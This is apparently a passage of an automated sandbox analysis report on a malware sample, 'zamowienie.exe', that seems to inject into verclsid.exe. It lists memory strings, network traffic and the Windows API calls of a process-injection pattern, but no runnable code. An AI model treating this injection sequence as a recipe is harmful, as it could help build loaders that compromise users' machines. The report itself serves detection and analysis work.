    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.hover.com/transfer_in?source=parked
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005A26000.00000004.10000000.00040000.00000000.sdmp, verclsid.exe, 00000007.00000002.3909219949.0000000007BD0000.00000004.00000800.00020000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002F36000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.instagram.com/hover_domains
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_se
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_n
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.svarus.online&utm_medium=parking&utm_campaign=s_land_host
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
    Source: verclsid.exe, 00000007.00000002.3907764738.0000000005894000.00000004.10000000.00040000.00000000.sdmp, dmQRVBQMPL.exe, 00000008.00000002.3907095039.0000000002DA4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000009.00000002.3235040618.0000000005204000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.svarus.online&amp;reg_source=parking_auto
    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49876
    Source: unknown Network traffic detected: HTTP traffic on port 49876 -> 443
    Source: unknown HTTPS traffic detected: 185.17.43.223:443 -> 192.168.2.5:49876 version: TLS 1.2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_00405640 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,LdrInitializeThunk,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,LdrInitializeThunk,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,LdrInitializeThunk,ShowWindow,LdrInitializeThunk,SendMessageA,CreatePopupMenu,LdrInitializeThunk,AppendMenuA,GetWindowRect,LdrInitializeThunk,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,LdrInitializeThunk,SetClipboardData,CloseClipboard,0_2_00405640
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F335C0 NtCreateMutant,LdrInitializeThunk,3_2_34F335C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_34F32C70
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_34F32DF0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F33090 NtSetValueKey,3_2_34F33090
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F33010 NtOpenDirectoryObject,3_2_34F33010
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F33D70 NtOpenThread,3_2_34F33D70
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F33D10 NtOpenProcessToken,3_2_34F33D10
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F339B0 NtGetContextThread,3_2_34F339B0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F34650 NtSuspendThread,3_2_34F34650
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F34340 NtSetContextThread,3_2_34F34340
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32CF0 NtOpenProcess,3_2_34F32CF0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32CC0 NtQueryVirtualMemory,3_2_34F32CC0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32CA0 NtQueryInformationToken,3_2_34F32CA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32C60 NtCreateKey,3_2_34F32C60
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32C00 NtQueryInformationProcess,3_2_34F32C00
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32DD0 NtDelayExecution,3_2_34F32DD0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32DB0 NtEnumerateKey,3_2_34F32DB0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32D30 NtUnmapViewOfSection,3_2_34F32D30
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32D10 NtMapViewOfSection,3_2_34F32D10
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32D00 NtSetInformationFile,3_2_34F32D00
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32EE0 NtQueueApcThread,3_2_34F32EE0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32EA0 NtAdjustPrivilegesToken,3_2_34F32EA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32E80 NtReadVirtualMemory,3_2_34F32E80
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32E30 NtWriteVirtualMemory,3_2_34F32E30
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32FE0 NtCreateFile,3_2_34F32FE0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32FB0 NtResumeThread,3_2_34F32FB0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32FA0 NtQuerySection,3_2_34F32FA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32F90 NtProtectVirtualMemory,3_2_34F32F90
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32F60 NtCreateProcessEx,3_2_34F32F60
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32F30 NtCreateSection,3_2_34F32F30
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32AF0 NtWriteFile,3_2_34F32AF0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32AD0 NtReadFile,3_2_34F32AD0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32AB0 NtWaitForSingleObject,3_2_34F32AB0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32BF0 NtAllocateVirtualMemory,3_2_34F32BF0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32BE0 NtQueryValueKey,3_2_34F32BE0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32BA0 NtEnumerateValueKey,3_2_34F32BA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32B80 NtQueryInformationFile,3_2_34F32B80
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F32B60 NtClose,3_2_34F32B60
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF4650 NtSuspendThread,LdrInitializeThunk,7_2_04EF4650
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF4340 NtSetContextThread,LdrInitializeThunk,7_2_04EF4340
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2CA0 NtQueryInformationToken,LdrInitializeThunk,7_2_04EF2CA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2C60 NtCreateKey,LdrInitializeThunk,7_2_04EF2C60
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2C70 NtFreeVirtualMemory,LdrInitializeThunk,7_2_04EF2C70
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2DF0 NtQuerySystemInformation,LdrInitializeThunk,7_2_04EF2DF0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2DD0 NtDelayExecution,LdrInitializeThunk,7_2_04EF2DD0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2D30 NtUnmapViewOfSection,LdrInitializeThunk,7_2_04EF2D30
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2D10 NtMapViewOfSection,LdrInitializeThunk,7_2_04EF2D10
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2EE0 NtQueueApcThread,LdrInitializeThunk,7_2_04EF2EE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2E80 NtReadVirtualMemory,LdrInitializeThunk,7_2_04EF2E80
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2FE0 NtCreateFile,LdrInitializeThunk,7_2_04EF2FE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2FB0 NtResumeThread,LdrInitializeThunk,7_2_04EF2FB0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2F30 NtCreateSection,LdrInitializeThunk,7_2_04EF2F30
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2AF0 NtWriteFile,LdrInitializeThunk,7_2_04EF2AF0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2AD0 NtReadFile,LdrInitializeThunk,7_2_04EF2AD0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2BE0 NtQueryValueKey,LdrInitializeThunk,7_2_04EF2BE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_04EF2BF0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2BA0 NtEnumerateValueKey,LdrInitializeThunk,7_2_04EF2BA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2B60 NtClose,LdrInitializeThunk,7_2_04EF2B60
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF35C0 NtCreateMutant,LdrInitializeThunk,7_2_04EF35C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF39B0 NtGetContextThread,LdrInitializeThunk,7_2_04EF39B0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2CF0 NtOpenProcess,7_2_04EF2CF0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2CC0 NtQueryVirtualMemory,7_2_04EF2CC0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2C00 NtQueryInformationProcess,7_2_04EF2C00
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2DB0 NtEnumerateKey,7_2_04EF2DB0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2D00 NtSetInformationFile,7_2_04EF2D00
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2EA0 NtAdjustPrivilegesToken,7_2_04EF2EA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2E30 NtWriteVirtualMemory,7_2_04EF2E30
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2FA0 NtQuerySection,7_2_04EF2FA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2F90 NtProtectVirtualMemory,7_2_04EF2F90
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2F60 NtCreateProcessEx,7_2_04EF2F60
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2AB0 NtWaitForSingleObject,7_2_04EF2AB0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF2B80 NtQueryInformationFile,7_2_04EF2B80
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF3090 NtSetValueKey,7_2_04EF3090
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF3010 NtOpenDirectoryObject,7_2_04EF3010
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF3D70 NtOpenThread,7_2_04EF3D70
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF3D10 NtOpenProcessToken,7_2_04EF3D10
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EC8F80 NtCreateFile,7_2_02EC8F80
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EC9290 NtClose,7_2_02EC9290
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EC93F0 NtAllocateVirtualMemory,7_2_02EC93F0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EC90F0 NtReadFile,7_2_02EC90F0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EC91F0 NtDeleteFile,7_2_02EC91F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 0_2_004034F1 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,LdrInitializeThunk,GetVersionExA,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,LdrInitializeThunk,SHGetFileInfoA,GetCommandLineA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrlenA,LdrInitializeThunk,wsprintfA,GetFileAttributesA,DeleteFileA,LdrInitializeThunk,SetCurrentDirectoryA,LdrInitializeThunk,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,0_2_004034F1
    Source: C:\Users\user\Desktop\zamowienie.exe File created: C:\Windows\resources\synderegistres.lnk
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC01AA3_2_34FC01AA
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB41A23_2_34FB41A2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F881583_2_34F88158
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9A1183_2_34F9A118
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF01003_2_34EF0100
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F802C03_2_34F802C0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA02743_2_34FA0274
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0E3F03_2_34F0E3F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FC03E63_2_34FC03E6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBA3523_2_34FBA352
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF0CF23_2_34EF0CF2
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA0CB53_2_34FA0CB5
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F00C003_2_34F00C00
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFADE03_2_34EFADE0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F18DBF3_2_34F18DBF
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F9CD1F3_2_34F9CD1F
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0AD003_2_34F0AD00
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBEEDB3_2_34FBEEDB
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F12E903_2_34F12E90
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBCE933_2_34FBCE93
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F00E593_2_34F00E59
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBEE263_2_34FBEE26
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0CFE03_2_34F0CFE0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EF2FC83_2_34EF2FC8
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F7EFA03_2_34F7EFA0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F74F403_2_34F74F40
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F20F303_2_34F20F30
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FA2F303_2_34FA2F30
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F42F283_2_34F42F28
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F2E8F03_2_34F2E8F0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EE68B83_2_34EE68B8
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F0A8403_2_34F0A840
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F028403_2_34F02840
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F029A03_2_34F029A0
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FCA9A63_2_34FCA9A6
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34F169623_2_34F16962
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34EFEA803_2_34EFEA80
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FB6BD73_2_34FB6BD7
    Source: C:\Users\user\Desktop\zamowienie.exeCode function: 3_2_34FBAB403_2_34FBAB40
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F6E4F67_2_04F6E4F6
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F724467_2_04F72446
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F644207_2_04F64420
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F805917_2_04F80591
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC05357_2_04EC0535
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EDC6E07_2_04EDC6E0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EBC7C07_2_04EBC7C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC07707_2_04EC0770
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EE47507_2_04EE4750
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F520007_2_04F52000
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F781CC7_2_04F781CC
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F801AA7_2_04F801AA
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F741A27_2_04F741A2
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F481587_2_04F48158
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EB01007_2_04EB0100
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F5A1187_2_04F5A118
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F402C07_2_04F402C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F602747_2_04F60274
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ECE3F07_2_04ECE3F0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F803E67_2_04F803E6
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7A3527_2_04F7A352
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EB0CF27_2_04EB0CF2
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F60CB57_2_04F60CB5
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC0C007_2_04EC0C00
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EBADE07_2_04EBADE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ED8DBF7_2_04ED8DBF
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F5CD1F7_2_04F5CD1F
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ECAD007_2_04ECAD00
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7EEDB7_2_04F7EEDB
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7CE937_2_04F7CE93
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ED2E907_2_04ED2E90
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC0E597_2_04EC0E59
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7EE267_2_04F7EE26
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ECCFE07_2_04ECCFE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EB2FC87_2_04EB2FC8
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F3EFA07_2_04F3EFA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F34F407_2_04F34F40
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F62F307_2_04F62F30
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F02F287_2_04F02F28
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EE0F307_2_04EE0F30
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EEE8F07_2_04EEE8F0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EA68B87_2_04EA68B8
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ECA8407_2_04ECA840
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC28407_2_04EC2840
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC29A07_2_04EC29A0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F8A9A67_2_04F8A9A6
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ED69627_2_04ED6962
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EBEA807_2_04EBEA80
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F76BD77_2_04F76BD7
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7AB407_2_04F7AB40
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EB14607_2_04EB1460
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7F43F7_2_04F7F43F
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F895C37_2_04F895C3
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F5D5B07_2_04F5D5B0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F775717_2_04F77571
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F716CC7_2_04F716CC
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F056307_2_04F05630
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7F7B07_2_04F7F7B0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7F0E07_2_04F7F0E0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F770E97_2_04F770E9
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC70C07_2_04EC70C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F6F0CC7_2_04F6F0CC
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04ECB1B07_2_04ECB1B0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EF516C7_2_04EF516C
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F8B16B7_2_04F8B16B
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EAF1727_2_04EAF172
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F612ED7_2_04F612ED
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EDB2C07_2_04EDB2C0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC52A07_2_04EC52A0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F0739A7_2_04F0739A
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EAD34C7_2_04EAD34C
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7132D7_2_04F7132D
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7FCF27_2_04F7FCF2
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F39C327_2_04F39C32
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EDFDC07_2_04EDFDC0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F77D737_2_04F77D73
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC3D407_2_04EC3D40
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F71D5A7_2_04F71D5A
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC9EB07_2_04EC9EB0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04E83FD27_2_04E83FD2
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04E83FD57_2_04E83FD5
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7FFB17_2_04F7FFB1
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC1F927_2_04EC1F92
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7FF097_2_04F7FF09
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC38E07_2_04EC38E0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F2D8007_2_04F2D800
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EC99507_2_04EC9950
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EDB9507_2_04EDB950
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F559107_2_04F55910
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F6DAC67_2_04F6DAC6
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F05AA07_2_04F05AA0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F61AA37_2_04F61AA3
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F5DAAC7_2_04F5DAAC
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F33A6C7_2_04F33A6C
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F77A467_2_04F77A46
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7FA497_2_04F7FA49
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F35BF07_2_04F35BF0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EFDBF97_2_04EFDBF9
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04EDFB807_2_04EDFB80
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_04F7FB767_2_04F7FB76
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EB1BC07_2_02EB1BC0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EACAC07_2_02EACAC0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EAAEA47_2_02EAAEA4
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EACCE07_2_02EACCE0
    Source: C:\Windows\SysWOW64\verclsid.exeCode function: 7_2_02EAAD607_2_02EAAD60
